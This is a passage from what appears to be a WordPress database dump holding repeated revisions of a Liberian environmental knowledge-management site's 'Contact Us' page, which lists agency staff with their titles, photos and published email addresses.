href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Joseph G. Duolupeh BSc, MPSM.</strong>\n</br>\nManager, Strategic Planning Unit\n</br>\nForestry Development Auhtority\n</br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a>\n<p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 10:29:35','2021-03-23 10:29:35','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3608,42,'2021-03-23 10:29:35','2021-03-23 10:29:35','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Joseph G. Duolupeh BSc, MPSM.</strong>\n</br>\nManager, Strategic Planning Unit\n</br>\nForestry Development Auhtority\n</br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a>\n<p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 10:29:35','2021-03-23 10:29:35','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3609,42,'2021-03-23 10:29:36','2021-03-23 10:29:36','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a 